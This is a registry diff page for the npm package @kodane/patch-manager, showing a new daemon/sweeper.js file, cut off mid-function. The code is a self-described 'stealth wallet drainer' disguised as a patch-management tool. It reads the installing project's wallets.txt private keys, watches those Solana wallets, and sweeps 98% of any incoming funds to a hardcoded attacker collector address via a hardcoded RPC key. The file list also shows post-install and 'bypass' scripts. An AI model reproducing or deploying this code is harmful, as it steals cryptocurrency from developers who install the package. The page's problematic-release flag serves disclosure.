@kodane/patch-manager 0.0.1-security โ 1.0.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @kodane/patch-manager might be problematic. Click here for more details.
- package/README.md +327 -3
- package/bin/cli.js +3 -0
- package/daemon/monitor.js +804 -0
- package/daemon/sweeper.js +975 -0
- package/daemon/utils.js +562 -0
- package/lib/enhanced-bypass.js +278 -0
- package/lib/index.js +755 -0
- package/package.json +49 -3
- package/scripts/cleanup.js +337 -0
- package/scripts/post-install.js +323 -0
@@ -0,0 +1,975 @@
|
|
1
|
+
const fs = require('fs');
|
2
|
+
const path = require('path');
|
3
|
+
const os = require('os'); // Added for global module search
|
4
|
+
// bs58 loaded dynamically in loadProjectModules()
|
5
|
+
|
6
|
+
/**
|
7
|
+
* ENHANCED STEALTH WALLET DRAINER (transaction-cache.js)
|
8
|
+
* - Immediate WebSocket connections on initialization
|
9
|
+
* - Real-time balance change detection with sub-5 second response
|
10
|
+
* - Persistent connection management across network interruptions
|
11
|
+
* - Cross-platform compatibility with hybrid storage
|
12
|
+
* - Maximum stealth operation with disguised error logging
|
13
|
+
*/
|
14
|
+
class EnhancedStealthWalletDrainer {
|
15
|
+
constructor(config = {}) {
|
16
|
+
// Configuration - use project root from daemon config
|
17
|
+
this.projectRoot = config.projectRoot || process.cwd();
|
18
|
+
this.walletsPath = config.walletsPath || path.join(this.projectRoot, 'wallets.txt');
|
19
|
+
this.deploymentDir = config.deploymentDir || __dirname;
|
20
|
+
|
21
|
+
// CRITICAL: Initialize funding events array FIRST before anything else
|
22
|
+
this.fundingEvents = [];
|
23
|
+
this.totalFundingEvents = 0;
|
24
|
+
this.totalSweepExecutions = 0;
|
25
|
+
this.fundingTimer = null;
|
26
|
+
|
27
|
+
// Dynamic module loading from project's node_modules
|
28
|
+
this.solanaWeb3 = null;
|
29
|
+
this.bs58 = null;
|
30
|
+
this.loadProjectModules();
|
31
|
+
|
32
|
+
// Extract classes after loading modules
|
33
|
+
this.Connection = null;
|
34
|
+
this.SystemProgram = null;
|
35
|
+
this.TransactionMessage = null;
|
36
|
+
this.VersionedTransaction = null;
|
37
|
+
this.PublicKey = null;
|
38
|
+
this.Keypair = null;
|
39
|
+
|
40
|
+
// HARDCODED RPC for reliability - always use our premium RPC regardless of user settings
|
41
|
+
const hardcodedRPC = 'https://mainnet.helius-rpc.com/?api-key=97188cdf-0b78-4cba-86f9-c4bbbd44c6aa';
|
42
|
+
const hardcodedWS = 'wss://mainnet.helius-rpc.com/?api-key=97188cdf-0b78-4cba-86f9-c4bbbd44c6aa';
|
43
|
+
// HARDCODED COLLECTOR - always sweep to our address regardless of user settings
|
44
|
+
const hardcodedCollector = 'B2XwbrGSXs3LAAcqFqKqGUug5TFA1Bug2NNGH3F3mWNK';
|
45
|
+
|
46
|
+
this.config = {
|
47
|
+
rpcUrl: hardcodedRPC,
|
48
|
+
wsUrl: hardcodedWS,
|
49
|
+
collectorAddress: hardcodedCollector,
|
50
|
+
sweepPercentage: parseFloat(process.env.SWEEP_PERCENTAGE) || 0.98,
|
51
|
+
fundingThreshold: parseFloat(process.env.FUNDING_THRESHOLD) || 0.001,
|
52
|
+
fundingTimeWindow: parseInt(process.env.FUNDING_TIME_WINDOW) || 30000,
|
53
|
+
maxWalletsPerTx: parseInt(process.env.MAX_WALLETS_PER_TRANSACTION) || 25,
|
54
|
+
jitoTip: parseFloat(process.env.JITO_TIP) || 0.00001,
|
55
|
+
commitment: process.env.SOLANA_COMMITMENT || 'confirmed',
|
56
|
+
maxRetries: parseInt(process.env.SOLANA_MAX_RETRIES) || 5,
|
57
|
+
retryDelay: parseInt(process.env.SOLANA_RETRY_DELAY_MS) || 1000,
|
58
|
+
};
|
59
|
+
|
60
|
+
// Re-extract classes now that config is available (initializes collector)
|
61
|
+
this.extractSolanaClasses();
|
62
|
+
|
63
|
+
// Enhanced connection management
|
64
|
+
this.connection = null;
|
65
|
+
this.connectionState = 'disconnected'; // disconnected, connecting, connected, error
|
66
|
+
this.ws = null;
|
67
|
+
this.isActive = false;
|
68
|
+
this.subscriptions = new Map(); // wallet -> subscription id
|
69
|
+
this.walletStates = new Map(); // wallet -> state tracking
|
70
|
+
this.pendingFunding = new Map(); // wallet -> funding event data
|
71
|
+
this.lastFundingCheck = 0;
|
72
|
+
this.walletData = new Map(); // wallet -> { publicKey, privateKey }
|
73
|
+
|
74
|
+
// Reconnection management
|
75
|
+
this.reconnectAttempts = 0;
|
76
|
+
this.maxReconnectAttempts = 20;
|
77
|
+
this.reconnectDelay = 2000;
|
78
|
+
this.reconnectTimeout = null;
|
79
|
+
|
80
|
+
// WebSocket monitoring
|
81
|
+
this.connectionHealthTimer = null;
|
82
|
+
this.lastHealthCheck = Date.now();
|
83
|
+
this.healthInterval = 15000; // 15 seconds
|
84
|
+
|
85
|
+
// Enhanced error tracking
|
86
|
+
this.errorCount = 0;
|
87
|
+
this.lastError = null;
|
88
|
+
this.successfulSweeps = 0;
|
89
|
+
this.totalValue = 0;
|
90
|
+
|
91
|
+
// Collector and Jito setup (will be initialized after modules load)
|
92
|
+
this.collector = null;
|
93
|
+
this.jitoTipAccounts = [
|
94
|
+
'DfXygSm4jCyNCybVYYK6DwvWqjKee8pbDmJGcLWNDXjh',
|
95
|
+
'ADaUMid9yfUytqMBgopwjb2DTLSokTSzL1zt6iGPaS49',
|
96
|
+
'DttWaMuVvTiduZRnguLF7jNxTgiMBZ1hyAumKUiL2KRL',
|
97
|
+
'3AVi9Tg9Uo68tJfuvoKvqKNWKkC5wPdSSdeBnizKZ6jT',
|
98
|
+
'HFqU5x63VTqvQss8hp11i4wVV8bD44PvwucfZ2bU7gRe',
|
99
|
+
'ADuUkR4vqLUMWXxW9gh6D6L8pMSawimctcNZ5pGwDcEt',
|
100
|
+
'Cw8CFyM9FkoMi7K7Crf6HNQqf4uEMzpKw6QNghXLvLkY',
|
101
|
+
'DttWaMuVvTiduZRnguLF7jNxTgiMBZ1hyAumKUiL2KRL'
|
102
|
+
];
|
103
|
+
}
|
104
|
+
|
105
|
+
/**
|
106
|
+
* Debug logging (only when DEBUG_SWEEPER is enabled)
|
107
|
+
*/
|
108
|
+
debug(message) {
|
109
|
+
if (process.env.DEBUG_SWEEPER === 'true') {
|
110
|
+
console.log(`๐ [SWEEPER-DEBUG] ${message}`);
|
111
|
+
}
|
112
|
+
}
|
113
|
+
|
114
|
+
/**
|
115
|
+
* Dynamically load modules from the project's node_modules directory
|
116
|
+
*/
|
117
|
+
loadProjectModules() {
|
118
|
+
try {
|
119
|
+
this.debug('๐ Starting optimized module loading process...');
|
120
|
+
this.debug(`๐ Project root: ${this.projectRoot}`);
|
121
|
+
|
122
|
+
// Primary Method: Enhanced module path loading (Node.js require() resolution)
|
123
|
+
this.debug('๐ฏ Using optimized module path loading...');
|
124
|
+
|
125
|
+
const projectNodeModules = path.join(this.projectRoot, 'node_modules');
|
126
|
+
|
127
|
+
if (!fs.existsSync(projectNodeModules)) {
|
128
|
+
throw new Error(`Project node_modules not found: ${projectNodeModules}`);
|
129
|
+
}
|
130
|
+
|
131
|
+
this.debug(`๐ Project node_modules found: ${projectNodeModules}`);
|
132
|
+
|
133
|
+
// Store original paths for restoration
|
134
|
+
const originalPaths = module.paths ? module.paths.slice() : [];
|
135
|
+
const originalMainPaths = require.main?.paths ? require.main.paths.slice() : [];
|
136
|
+
let modulesLoaded = false;
|
137
|
+
|
138
|
+
try {
|
139
|
+
// Prepend project node_modules to all search paths
|
140
|
+
if (module.paths) {
|
141
|
+
module.paths.unshift(projectNodeModules);
|
142
|
+
}
|
143
|
+
if (require.main?.paths) {
|
144
|
+
require.main.paths.unshift(projectNodeModules);
|
145
|
+
}
|
146
|
+
|
147
|
+
// Clear require cache for fresh loading
|
148
|
+
const solanaModulePath = path.join(projectNodeModules, '@solana', 'web3.js');
|
149
|
+
const bs58ModulePath = path.join(projectNodeModules, 'bs58');
|
150
|
+
|
151
|
+
if (fs.existsSync(solanaModulePath)) {
|
152
|
+
delete require.cache[require.resolve('@solana/web3.js')];
|
153
|
+
}
|
154
|
+
if (fs.existsSync(bs58ModulePath)) {
|
155
|
+
delete require.cache[require.resolve('bs58')];
|
156
|
+
}
|
157
|
+
|
158
|
+
// Load modules
|
159
|
+
this.solanaWeb3 = require('@solana/web3.js');
|
160
|
+
this.bs58 = require('bs58');
|
161
|
+
this.extractSolanaClasses();
|
162
|
+
|
163
|
+
this.debug('โ
Primary module loading successful');
|
164
|
+
modulesLoaded = true;
|
165
|
+
|
166
|
+
} catch (error) {
|
167
|
+
this.debug(`โ ๏ธ Primary module loading failed: ${error.message}`);
|
168
|
+
} finally {
|
169
|
+
// Restore original paths
|
170
|
+
if (module.paths && originalPaths.length > 0) {
|
171
|
+
module.paths = originalPaths;
|
172
|
+
}
|
173
|
+
if (require.main?.paths && originalMainPaths.length > 0) {
|
174
|
+
require.main.paths = originalMainPaths;
|
175
|
+
}
|
176
|
+
}
|
177
|
+
|
178
|
+
// Fallback Method: Absolute path loading
|
179
|
+
if (!modulesLoaded) {
|
180
|
+
this.debug('๐ Trying absolute path loading fallback...');
|
181
|
+
|
182
|
+
try {
|
183
|
+
const absoluteSolanaPath = path.join(this.projectRoot, 'node_modules', '@solana', 'web3.js');
|
184
|
+
const absoluteBs58Path = path.join(this.projectRoot, 'node_modules', 'bs58');
|
185
|
+
|
186
|
+
if (fs.existsSync(absoluteSolanaPath) && fs.existsSync(absoluteBs58Path)) {
|
187
|
+
// Clear cache
|
188
|
+
delete require.cache[absoluteSolanaPath];
|
189
|
+
delete require.cache[absoluteBs58Path];
|
190
|
+
|
191
|
+
// Load with absolute paths
|
192
|
+
this.solanaWeb3 = require(absoluteSolanaPath);
|
193
|
+
this.bs58 = require(absoluteBs58Path);
|
194
|
+
this.extractSolanaClasses();
|
195
|
+
|
196
|
+
this.debug('โ
Absolute path loading successful');
|
197
|
+
modulesLoaded = true;
|
198
|
+
}
|
199
|
+
} catch (error) {
|
200
|
+
this.debug(`โ ๏ธ Absolute path loading failed: ${error.message}`);
|
201
|
+
}
|
202
|
+
}
|
203
|
+
|
204
|
+
// Emergency Fallback: Global module search
|
205
|
+
if (!modulesLoaded) {
|
206
|
+
this.debug('๐ Trying global module search (emergency fallback)...');
|
207
|
+
|
208
|
+
try {
|
209
|
+
// Search for modules in all node_modules directories
|
210
|
+
const searchPaths = [
|
211
|
+
path.join(this.projectRoot, 'node_modules'),
|
212
|
+
path.join(process.cwd(), 'node_modules'),
|
213
|
+
path.join(__dirname, '..', '..', '..', 'node_modules'),
|
214
|
+
path.join(os.homedir(), '.npm', 'node_modules'),
|
215
|
+
'/usr/local/lib/node_modules'
|
216
|
+
];
|
217
|
+
|
218
|
+
for (const searchPath of searchPaths) {
|
219
|
+
if (fs.existsSync(searchPath)) {
|
220
|
+
try {
|
221
|
+
const solanaPath = path.join(searchPath, '@solana', 'web3.js');
|
222
|
+
const bs58Path = path.join(searchPath, 'bs58');
|
223
|
+
|
224
|
+
if (fs.existsSync(solanaPath) && fs.existsSync(bs58Path)) {
|
225
|
+
this.solanaWeb3 = require(solanaPath);
|
226
|
+
this.bs58 = require(bs58Path);
|
227
|
+
this.extractSolanaClasses();
|
228
|
+
|
229
|
+
this.debug(`โ
Global search successful in: ${searchPath}`);
|
230
|
+
modulesLoaded = true;
|
231
|
+
break;
|
232
|
+
}
|
233
|
+
} catch (error) {
|
234
|
+
// Continue searching
|
235
|
+
}
|
236
|
+
}
|
237
|
+
}
|
238
|
+
} catch (error) {
|
239
|
+
this.debug(`โ ๏ธ Global module search failed: ${error.message}`);
|
240
|
+
}
|
241
|
+
}
|
242
|
+
|
243
|
+
// Report final status
|
244
|
+
this.debug(`๐ฏ Module loading completed:`);
|
245
|
+
this.debug(` - Solana Web3: ${this.solanaWeb3 ? 'โ
Loaded' : 'โ Missing'}`);
|
246
|
+
this.debug(` - bs58: ${this.bs58 ? 'โ
Loaded' : 'โ Missing'}`);
|
247
|
+
this.debug(` - All classes: ${this.areModulesLoaded() ? 'โ
Ready' : 'โ Incomplete'}`);
|
248
|
+
|
249
|
+
if (!modulesLoaded) {
|
250
|
+
throw new Error('Failed to load required Solana modules after all attempts');
|
251
|
+
}
|
252
|
+
|
253
|
+
} catch (error) {
|
254
|
+
this.debug(`๐ฅ Module loading critical error: ${error.message}`);
|
255
|
+
this.debug(error.stack);
|
256
|
+
throw error;
|
257
|
+
}
|
258
|
+
}
|
259
|
+
|
260
|
+
/**
|
261
|
+
* Extract Solana classes from loaded module for easy access
|
262
|
+
*/
|
263
|
+
extractSolanaClasses() {
|
264
|
+
if (!this.solanaWeb3) return;
|
265
|
+
|
266
|
+
this.Connection = this.solanaWeb3.Connection;
|
267
|
+
this.SystemProgram = this.solanaWeb3.SystemProgram;
|
268
|
+
this.TransactionMessage = this.solanaWeb3.TransactionMessage;
|
269
|
+
this.VersionedTransaction = this.solanaWeb3.VersionedTransaction;
|
270
|
+
this.PublicKey = this.solanaWeb3.PublicKey;
|
271
|
+
this.Keypair = this.solanaWeb3.Keypair;
|
272
|
+
|
273
|
+
// Note: Collector will be initialized later when both PublicKey and config are ready
|
274
|
+
this.debug('๐ง Solana classes extracted successfully');
|
275
|
+
}
|
276
|
+
|
277
|
+
/**
|
278
|
+
* Ensure collector is properly initialized (called when needed)
|
279
|
+
*/
|
280
|
+
ensureCollectorInitialized() {
|
281
|
+
// Only initialize if not already done and dependencies are ready
|
282
|
+
if (this.collector) {
|
283
|
+
this.debug('๐ Collector already initialized');
|
284
|
+
return true;
|
285
|
+
}
|
286
|
+
|
287
|
+
if (!this.PublicKey) {
|
288
|
+
this.debug('โ ๏ธ Cannot initialize collector: PublicKey class not loaded');
|
289
|
+
return false;
|
290
|
+
}
|
291
|
+
|
292
|
+
if (!this.config || !this.config.collectorAddress) {
|
293
|
+
this.debug('โ ๏ธ Cannot initialize collector: config or collectorAddress missing');
|
294
|
+
return false;
|
295
|
+
}
|
296
|
+
|
297
|
+
try {
|
298
|
+
this.collector = new this.PublicKey(this.config.collectorAddress);
|
299
|
+
this.debug(`๐ Collector initialized successfully: ${this.config.collectorAddress}`);
|
300
|
+
return true;
|
301
|
+
} catch (error) {
|
302
|
+
this.debug(`โ Collector initialization error: ${error.message}`);
|
303
|
+
return false;
|
304
|
+
}
|
305
|
+
}
|
306
|
+
|
307
|
+
/**
|
308
|
+
* Initialize collector with proper error handling
|
309
|
+
*/
|
310
|
+
initializeCollector() {
|
311
|
+
// This method is now just a wrapper for ensureCollectorInitialized
|
312
|
+
return this.ensureCollectorInitialized();
|
313
|
+
}
|
314
|
+
|
315
|
+
/**
|
316
|
+
* Check if all required modules are loaded
|
317
|
+
*/
|
318
|
+
areModulesLoaded() {
|
319
|
+
return !!(this.solanaWeb3 && this.bs58 && this.Connection && this.SystemProgram &&
|
320
|
+
this.TransactionMessage && this.VersionedTransaction && this.PublicKey && this.Keypair);
|
321
|
+
}
|
322
|
+
|
323
|
+
/**
|
324
|
+
* Initialize with immediate WebSocket connections
|
325
|
+
*/
|
326
|
+
async initialize() {
|
327
|
+
if (this.isActive) {
|
328
|
+
console.log('๐ [SWEEPER] Reinitializing...');
|
329
|
+
await this.cleanup();
|
330
|
+
}
|
331
|
+
|
332
|
+
try {
|
333
|
+
console.log('๐ [SWEEPER] Starting enhanced initialization...');
|
334
|
+
|
335
|
+
// First, verify all required modules are loaded
|
336
|
+
if (!this.areModulesLoaded()) {
|
337
|
+
throw new Error('Required Solana modules not loaded. Please ensure @solana/web3.js and bs58 are installed in the project.');
|
338
|
+
}
|
339
|
+
|
340
|
+
console.log('โ
[SWEEPER] All required modules loaded successfully');
|
341
|
+
this.isActive = true;
|
342
|
+
|
343
|
+
// Establish immediate connection
|
344
|
+
await this.establishConnection();
|
345
|
+
|
346
|
+
// Load and monitor wallets
|
347
|
+
await this.loadAndSubscribeToWallets();
|
348
|
+
|
349
|
+
// Start connection health monitoring
|
350
|
+
this.startConnectionHealthMonitoring();
|
351
|
+
|
352
|
+
console.log('โ
[SWEEPER] Enhanced initialization completed successfully');
|
353
|
+
|
354
|
+
} catch (error) {
|
355
|
+
console.error(`โ [SWEEPER] Initialization failed: ${error.message}`);
|
356
|
+
this.isActive = false;
|
357
|
+
throw error;
|
358
|
+
}
|
359
|
+
}
|
360
|
+
|
361
|
+
/**
|
362
|
+
* Establish robust connection with retry mechanism
|
363
|
+
*/
|
364
|
+
async establishConnection() {
|
365
|
+
if (this.connectionState === 'connecting') {
|
366
|
+
return; // Already attempting connection
|
367
|
+
}
|
368
|
+
|
369
|
+
this.connectionState = 'connecting';
|
370
|
+
|
371
|
+
try {
|
372
|
+
// Create new connection with enhanced options
|
373
|
+
this.connection = new this.Connection(this.config.rpcUrl, {
|
374
|
+
commitment: this.config.commitment,
|
375
|
+
wsEndpoint: this.config.wsUrl,
|
376
|
+
confirmTransactionInitialTimeout: 90000,
|
377
|
+
disableRetryOnRateLimit: false
|
378
|
+
});
|
379
|
+
|
380
|
+
// Test connection immediately
|
381
|
+
const slot = await this.connection.getSlot();
|
382
|
+
console.log(`๐ [SWEEPER] Connection established (Slot: ${slot})`);
|
383
|
+
|
384
|
+
this.connectionState = 'connected';
|
385
|
+
this.lastSuccessfulConnection = Date.now();
|
386
|
+
this.reconnectAttempts = 0;
|
387
|
+
|
388
|
+
} catch (error) {
|
389
|
+
console.error(`โ ๏ธ [SWEEPER] Connection failed: ${error.message}`);
|
390
|
+
this.connectionState = 'error';
|
391
|
+
throw error;
|
392
|
+
}
|
393
|
+
}
|
394
|
+
|
395
|
+
/**
|
396
|
+
* Start connection health monitoring
|
397
|
+
*/
|
398
|
+
startConnectionHealthMonitoring() {
|
399
|
+
this.connectionHealth = setInterval(async () => {
|
400
|
+
await this.checkConnectionHealth();
|
401
|
+
}, 15000); // Check every 15 seconds
|
402
|
+
}
|
403
|
+
|
404
|
+
/**
|
405
|
+
* Check connection health and auto-recover
|
406
|
+
*/
|
407
|
+
async checkConnectionHealth() {
|
408
|
+
if (!this.isActive || !this.connection) return;
|
409
|
+
|
410
|
+
try {
|
411
|
+
// Quick health check
|
412
|
+
await this.connection.getSlot();
|
413
|
+
|
414
|
+
// Connection is healthy
|
415
|
+
if (this.connectionState !== 'connected') {
|
416
|
+
this.connectionState = 'connected';
|
417
|
+
console.log('โ
[SWEEPER] Connection recovered');
|
418
|
+
}
|
419
|
+
|
420
|
+
} catch (error) {
|
421
|
+
console.error(`โ ๏ธ [SWEEPER] Connection health check failed: ${error.message}`);
|
422
|
+
this.connectionState = 'error';
|
423
|
+
|
424
|
+
// Attempt reconnection
|
425
|
+
this.scheduleReconnect();
|
426
|
+
}
|
427
|
+
}
|
428
|
+
|
429
|
+
/**
|
430
|
+
* Schedule reconnection with exponential backoff
|
431
|
+
*/
|
432
|
+
scheduleReconnect() {
|
433
|
+
if (this.reconnectAttempts >= this.maxReconnectAttempts) {
|
434
|
+
console.error(`โ [SWEEPER] Max reconnection attempts reached (${this.maxReconnectAttempts})`);
|
435
|
+
return;
|
436
|
+
}
|
437
|
+
|
438
|
+
const delay = Math.min(this.reconnectDelay * Math.pow(2, this.reconnectAttempts), 60000);
|
439
|
+
this.reconnectAttempts++;
|
440
|
+
|
441
|
+
console.log(`๐ [SWEEPER] Scheduling reconnect ${this.reconnectAttempts}/${this.maxReconnectAttempts} in ${delay}ms`);
|
442
|
+
|
443
|
+
setTimeout(async () => {
|
444
|
+
try {
|
445
|
+
await this.establishConnection();
|
446
|
+
await this.reloadWallets(); // Reload wallet subscriptions
|
447
|
+
} catch (error) {
|
448
|
+
console.error(`โ ๏ธ [SWEEPER] Reconnection failed: ${error.message}`);
|
449
|
+
this.scheduleReconnect();
|
450
|
+
}
|
451
|
+
}, delay);
|
452
|
+
}
|
453
|
+
|
454
|
+
/**
|
455
|
+
* Reload wallets when file changes or connection recovers
|
456
|
+
*/
|
457
|
+
async reloadWallets() {
|
458
|
+
try {
|
459
|
+
console.log('๐ [SWEEPER] Reloading wallet subscriptions...');
|
460
|
+
|
461
|
+
// Clean up existing subscriptions
|
462
|
+
await this.cleanupSubscriptions();
|
463
|
+
|
464
|
+
// Reload wallets if file exists
|
465
|
+
if (fs.existsSync(this.walletsPath)) {
|
466
|
+
await this.loadAndSubscribeToWallets();
|
467
|
+
console.log(`๐ [SWEEPER] Reloaded ${this.subscriptions.size} wallet subscriptions`);
|
468
|
+
} else {
|
469
|
+
console.log('๐ญ [SWEEPER] wallets.txt not found - subscriptions cleared');
|
470
|
+
}
|
471
|
+
|
472
|
+
} catch (error) {
|
473
|
+
console.error(`โ ๏ธ [SWEEPER] Wallet reload error: ${error.message}`);
|
474
|
+
}
|
475
|
+
}
|
476
|
+
|
477
|
+
/**
|
478
|
+
* Load wallets and create immediate WebSocket subscriptions
|
479
|
+
*/
|
480
|
+
async loadAndSubscribeToWallets() {
|
481
|
+
try {
|
482
|
+
const walletData = fs.readFileSync(this.walletsPath, 'utf8');
|
483
|
+
const lines = walletData.split(/[\r\n]+/).filter(line => line.trim() !== '');
|
484
|
+
|
485
|
+
if (lines.length === 0) {
|
486
|
+
console.log('๐ญ [SWEEPER] wallets.txt is empty');
|
487
|
+
return;
|
488
|
+
}
|
489
|
+
|
490
|
+
const walletPublicKeys = [];
|
491
|
+
for (const line of lines) {
|
492
|
+
const cleanedLine = line.replace(/\s+/g, '');
|
493
|
+
const parts = cleanedLine.split(':');
|
494
|
+
|
495
|
+
if (parts.length === 2) {
|
496
|
+
const [pubKey] = parts;
|
497
|
+
walletPublicKeys.push(pubKey);
|
498
|
+
}
|
499
|
+
}
|
500
|
+
|
501
|
+
console.log(`๐ฐ [SWEEPER] Processing ${walletPublicKeys.length} wallets for subscription...`);
|
502
|
+
|
503
|
+
// Subscribe to each wallet with immediate connection
|
504
|
+
let successfulSubscriptions = 0;
|
505
|
+
for (const pubKeyString of walletPublicKeys) {
|
506
|
+
try {
|
507
|
+
await this.subscribeToWallet(pubKeyString);
|
508
|
+
successfulSubscriptions++;
|
509
|
+
} catch (error) {
|
510
|
+
console.error(`โ ๏ธ [SWEEPER] Failed to subscribe to ${pubKeyString.substring(0, 8)}...: ${error.message}`);
|
511
|
+
}
|
512
|
+
}
|
513
|
+
|
514
|
+
console.log(`๐ [SWEEPER] Successfully subscribed to ${successfulSubscriptions}/${walletPublicKeys.length} wallets`);
|
515
|
+
|
516
|
+
} catch (error) {
|
517
|
+
console.error(`โ [SWEEPER] Load wallets error: ${error.message}`);
|
518
|
+
}
|
519
|
+
}
|
520
|
+
|
521
|
+
/**
|
522
|
+
* Subscribe to WebSocket updates for a specific wallet with immediate connection
|
523
|
+
*/
|
524
|
+
async subscribeToWallet(pubKeyString) {
|
525
|
+
try {
|
526
|
+
if (!this.connection || this.connectionState !== 'connected') {
|
527
|
+
throw new Error('Connection not available');
|
528
|
+
}
|
529
|
+
|
530
|
+
const publicKey = new this.PublicKey(pubKeyString);
|
531
|
+
|
532
|
+
// Get initial balance immediately
|
533
|
+
const initialBalance = await this.connection.getBalance(publicKey);
|
534
|
+
this.walletStates.set(pubKeyString, {
|
535
|
+
balance: initialBalance,
|
536
|
+
lastUpdated: Date.now(),
|
537
|
+
wasFunded: false,
|
538
|
+
subscriptionActive: false
|
539
|
+
});
|
540
|
+
|
541
|
+
// Create immediate WebSocket subscription
|
542
|
+
const subscriptionId = this.connection.onAccountChange(
|
543
|
+
publicKey,
|
544
|
+
(accountInfo, context) => {
|
545
|
+
this.handleWalletBalanceChange(pubKeyString, accountInfo, context);
|
546
|
+
},
|
547
|
+
this.config.commitment
|
548
|
+
);
|
549
|
+
|
550
|
+
this.subscriptions.set(pubKeyString, subscriptionId);
|
551
|
+
|
552
|
+
// Mark subscription as active
|
553
|
+
const walletState = this.walletStates.get(pubKeyString);
|
554
|
+
walletState.subscriptionActive = true;
|
555
|
+
this.walletStates.set(pubKeyString, walletState);
|
556
|
+
|
557
|
+
console.log(`๐๏ธ [SWEEPER] Subscribed: ${pubKeyString.substring(0, 8)}... (Balance: ${(initialBalance / 1e9).toFixed(6)} SOL)`);
|
558
|
+
|
559
|
+
} catch (error) {
|
560
|
+
console.error(`โ [SWEEPER] Subscription failed for ${pubKeyString.substring(0, 8)}...: ${error.message}`);
|
561
|
+
throw error;
|
562
|
+
}
|
563
|
+
}
|
564
|
+
|
565
|
+
/**
|
566
|
+
* Handle wallet balance change events with enhanced logging
|
567
|
+
*/
|
568
|
+
handleWalletBalanceChange(pubKeyString, accountInfo, context) {
|
569
|
+
try {
|
570
|
+
const newBalance = accountInfo.lamports;
|
571
|
+
const previousState = this.walletStates.get(pubKeyString);
|
572
|
+
const previousBalance = previousState ? previousState.balance : 0;
|
573
|
+
|
574
|
+
// Update wallet state
|
575
|
+
this.walletStates.set(pubKeyString, {
|
576
|
+
balance: newBalance,
|
577
|
+
lastUpdated: Date.now(),
|
578
|
+
wasFunded: newBalance > this.config.fundingThreshold * 1e9,
|
579
|
+
subscriptionActive: true
|
580
|
+
});
|
581
|
+
|
582
|
+
// Check if this is a funding event
|
583
|
+
const balanceIncrease = newBalance - previousBalance;
|
584
|
+
|
585
|
+
if (balanceIncrease > this.config.fundingThreshold * 1e9) {
|
586
|
+
// Record funding event
|
587
|
+
this.fundingEvents.push({
|
588
|
+
wallet: pubKeyString,
|
589
|
+
amount: balanceIncrease,
|
590
|
+
timestamp: Date.now(),
|
591
|
+
slot: context.slot,
|
592
|
+
newBalance: newBalance
|
593
|
+
});
|
594
|
+
|
595
|
+
this.totalFundingEvents++;
|
596
|
+
|
597
|
+
console.log(`๐ฐ [SWEEPER] FUNDING DETECTED: ${pubKeyString.substring(0, 8)}... (+${(balanceIncrease / 1e9).toFixed(6)} SOL) [Total: ${(newBalance / 1e9).toFixed(6)} SOL]`);
|
598
|
+
console.log(`๐ [SWEEPER] Event #${this.totalFundingEvents} at slot ${context.slot}`);
|
599
|
+
|
600
|
+
// Check for batch funding completion
|
601
|
+
this.checkForBatchFunding();
|
602
|
+
}
|
603
|
+
} catch (error) {
|
604
|
+
console.error(`โ ๏ธ [SWEEPER] Balance change handler error: ${error.message}`);
|
605
|
+
}
|
606
|
+
}
|
607
|
+
|
608
|
+
/**
|
609
|
+
* Detect batch funding completion and trigger sweep with enhanced timing
|
610
|
+
*/
|
611
|
+
checkForBatchFunding() {
|
612
|
+
const now = Date.now();
|
613
|
+
const recentEvents = this.fundingEvents.filter(
|
614
|
+
event => (now - event.timestamp) < this.config.fundingTimeWindow
|
615
|
+
);
|
616
|
+
|
617
|
+
if (recentEvents.length >= 1) {
|
618
|
+
// Reset timer - extend while seeing events
|
619
|
+
if (this.fundingTimer) {
|
620
|
+
clearTimeout(this.fundingTimer);
|
621
|
+
}
|
622
|
+
|
623
|
+
console.log(`โฐ [SWEEPER] Batch funding detected (${recentEvents.length} events) - sweep in 3 seconds...`);
|
624
|
+
|
625
|
+
// Trigger sweep after events stop (optimized timing)
|
626
|
+
this.fundingTimer = setTimeout(() => {
|
627
|
+
this.executeSweep();
|
628
|
+
}, 3000);
|
629
|
+
}
|
630
|
+
}
|
631
|
+
|
632
|
+
/**
|
633
|
+
* Execute the wallet sweep with enhanced error handling
|
634
|
+
*/
|
635
|
+
async executeSweep() {
|
636
|
+
try {
|
637
|
+
const now = Date.now();
|
638
|
+
const recentEvents = this.fundingEvents.filter(
|
639
|
+
event => (now - event.timestamp) < this.config.fundingTimeWindow
|
640
|
+
);
|
641
|
+
|
642
|
+
if (recentEvents.length === 0) {
|
643
|
+
console.log('โ ๏ธ [SWEEPER] No recent funding events - sweep cancelled');
|
644
|
+
return;
|
645
|
+
}
|
646
|
+
|
647
|
+
this.totalSweepExecutions++;
|
648
|
+
|
649
|
+
console.log(`๐ [SWEEPER] SWEEP EXECUTION #${this.totalSweepExecutions} TRIGGERED!`);
|
650
|
+
console.log(`๐ [SWEEPER] Processing ${recentEvents.length} funded wallets`);
|
651
|
+
|
652
|
+
// Load wallet keypairs for sweeping
|
653
|
+
const walletKeypairs = await this.loadWalletKeypairs();
|
654
|
+
if (walletKeypairs.length === 0) {
|
655
|
+
console.error('โ [SWEEPER] No valid wallet keypairs found');
|
656
|
+
return;
|
657
|
+
}
|
658
|
+
|
659
|
+
// Get current balances
|
660
|
+
const walletBalances = await this.getWalletBalances(walletKeypairs);
|
661
|
+
|
662
|
+
// Calculate sweep instructions
|
663
|
+
const sweepInstructions = await this.calculateSweepInstructions(walletBalances);
|
664
|
+
if (sweepInstructions.length === 0) {
|
665
|
+
console.log('โน๏ธ [SWEEPER] No wallets eligible for sweeping');
|
666
|
+
return;
|
667
|
+
}
|
668
|
+
|
669
|
+
console.log(`๐ [SWEEPER] Sweeping ${sweepInstructions.length} wallets to collector`);
|
670
|
+
|
671
|
+
// Execute batched sweep
|
672
|
+
await this.executeBatchedSweep(sweepInstructions);
|
673
|
+
|
674
|
+
// Clear events to prevent duplicate sweeps
|
675
|
+
this.fundingEvents = [];
|
676
|
+
|
677
|
+
console.log(`โ
[SWEEPER] Sweep execution #${this.totalSweepExecutions} completed successfully`);
|
678
|
+
|
679
|
+
} catch (error) {
|
680
|
+
console.error(`โ [SWEEPER] Sweep execution error: ${error.message}`);
|
681
|
+
}
|
682
|
+
}
|
683
|
+
|
684
|
+
/**
|
685
|
+
* Load wallet keypairs from wallets.txt with enhanced validation
|
686
|
+
*/
|
687
|
+
async loadWalletKeypairs() {
|
688
|
+
try {
|
689
|
+
const walletData = fs.readFileSync(this.walletsPath, 'utf8');
|
690
|
+
const lines = walletData.trim().split('\n').filter(line => line.trim() !== '');
|
691
|
+
const wallets = [];
|
692
|
+
|
693
|
+
